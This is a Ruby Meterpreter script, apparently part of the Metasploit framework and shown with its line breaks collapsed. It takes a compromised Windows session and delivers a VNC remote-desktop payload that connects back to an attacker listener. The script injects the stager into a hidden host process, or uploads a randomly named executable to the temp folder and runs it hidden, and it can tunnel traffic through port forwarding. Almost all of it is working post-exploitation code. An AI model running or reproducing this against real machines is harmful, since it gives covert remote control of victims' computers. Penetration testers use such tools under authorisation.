# # Meterpreter script for obtaining a quick VNC session # session = client # # Options # opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ true, "The IP of a remote Metasploit listening for the connect back"], "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4545)"], "-v" => [ true, "The local port for the VNC proxy service (default: 5900)"], "-i" => [ false, "Inject the vnc server into a new process's memory instead of building an exe"], "-P" => [ true, "Executable to inject into (starts a new process). Only useful with -i (default: notepad.exe)"], "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"], "-O" => [ false, "Disable binding the VNC proxy to localhost (open it to the network)"], "-V" => [ false, "Disable the automatic launch of the VNC client"], "-t" => [ false, "Tunnel through the current session connection. (Will be slower)"], "-c" => [ false, "Enable the VNC courtesy shell"] ) # # Default parameters # if (client.sock and client.sock.respond_to? :peerhost and client.sock.peerhost) rhost = Rex::Socket.source_address(client.sock.peerhost) else rhost = Rex::Socket.source_address("") end rport = 4545 vport = 5900 lhost = "" autoconn = true autovnc = true anyaddr = false courtesy = false tunnel = false inject = false runme = "notepad.exe" pay = nil # # Option parsing # opts.parse(args) do |opt, idx, val| case opt when "-h" print_line(opts.usage) raise Rex::Script::Completed when "-r" rhost = val when "-p" rport = val.to_i when "-v" vport = val.to_i when "-P" runme = val when "-D" autoconn = false when "-O" anyaddr = true when "-V" autovnc = false when "-c" courtesy = true when "-t" tunnel = true autoconn = true when "-i" inject = true end end #check for proper Meterpreter Platform def unsupported print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end unsupported if client.platform !~ /win32|win64/i # # Create the raw payload # if (tunnel) print_status("Creating a VNC bind tcp stager: RHOST=#{lhost} LPORT=#{rport}") payload = "windows/vncinject/bind_tcp" pay = client.framework.payloads.create(payload) pay.datastore['RHOST'] = lhost pay.datastore['LPORT'] = rport pay.datastore['VNCPORT'] = vport else print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}") payload = "windows/vncinject/reverse_tcp" pay = client.framework.payloads.create(payload) pay.datastore['LHOST'] = rhost pay.datastore['LPORT'] = rport pay.datastore['VNCPORT'] = vport end if (not courtesy) pay.datastore['DisableCourtesyShell'] = true end if (anyaddr) pay.datastore['VNCHOST'] = "" end if autoconn mul = client.framework.exploits.create("multi/handler") mul.share_datastore(pay.datastore) mul.datastore['WORKSPACE'] = client.workspace mul.datastore['PAYLOAD'] = payload mul.datastore['EXITFUNC'] = 'process' mul.datastore['ExitOnSession'] = true mul.datastore['WfsDelay'] = 7 mul.datastore['AUTOVNC'] = autovnc print_status("Running payload handler") mul.exploit_simple( 'Payload' => mul.datastore['PAYLOAD'], 'RunAsJob' => true ) end raw = pay.generate if (inject) # # Create a host process # pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid print_status("Host process #{runme} has PID #{pid}") host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") print_status("Writing the VNC stager into memory...") host_process.memory.write(mem, raw) host_process.thread.create(mem, 0) else exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw) print_status("VNC stager executable #{exe.length} bytes long") # # Upload to the filesystem # tempdir = client.fs.file.expand_path("%TEMP%") tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" tempexe.gsub!("\\\\", "\\") fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)") # # Execute the agent # print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...") pid = session.sys.process.execute(tempexe, nil, {'Hidden' => true}) end if tunnel # Set up a port forward for the multi/handler to use for uploading the stage print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}") client.run_cmd("portfwd add -L -l #{rport} -p #{rport} -r #{lhost}") end